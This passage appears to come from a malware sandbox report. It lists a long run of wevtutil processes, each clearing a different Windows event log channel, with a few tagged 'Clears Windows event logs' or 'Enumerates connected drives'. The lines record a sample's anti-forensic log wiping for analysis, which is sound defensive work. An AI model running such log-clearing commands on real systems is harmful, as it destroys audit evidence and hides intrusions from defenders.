    WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:1700
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Calculator/Debug"
    3⤵
    - Enumerates connected drives
    PID:780
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:2776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:2604
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:2772
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:2940
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:2140
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:2844
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:2520
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:1748
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:2152
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:2420
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:2484
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:1684
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:2288
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:2632
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:2268
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:916
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:908
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:2188
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:2092
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:2648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:2376
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:2812
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:304
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:868
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:2384
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:2060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:1700
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:2540
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:2712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:692
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:2172
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:1092
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:1264
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:2428
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:2888
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:2732
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:2864
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:2892
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:2668
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:2444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:852
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:2220
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:332
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:2824
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:2212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:2816
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:916
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:908
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:2188
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:2092
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:2176
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:2812
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:2460
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:2548
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:2136
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:2636
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:2104
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:2780
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:2644
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:1776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    PID:1572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:2208
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:2000
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:1532
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:1748
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:2152
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:2120
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:2832
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Help/Operational"
    3⤵
    PID:1148
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    - Clears Windows event logs
    PID:2016
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:2228
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:2216
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IKE/Operational"
    3⤵
    PID:2704
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:3016
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:2960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:2204
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:2408
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-International/Operational"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:992
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:1036
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:2588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:576
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:2068
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:2060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:2524
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:1604
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:2480
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:2776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:2180
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:2100
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:2140
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:1672
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:2172
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:2284
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:1532
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:2356
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:568
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:3024
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:2504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:156
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:2552
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:2072
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:2280
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:2960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:868
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:2548
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:2684
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"
    3⤵
    - Clears Windows event logs
    PID:2180
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:2140
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:1368
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:1264
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:2552
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:2152
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:1836
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:796
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:2284
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:2220
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:2880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:2992
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:2704
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:1772
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:1756
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:2504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:2588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:2060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:2500
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:2780
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:2812
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:2532
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:1444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:2204
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:2236
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:2644
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:2864
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:568
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:2000
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:1064
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
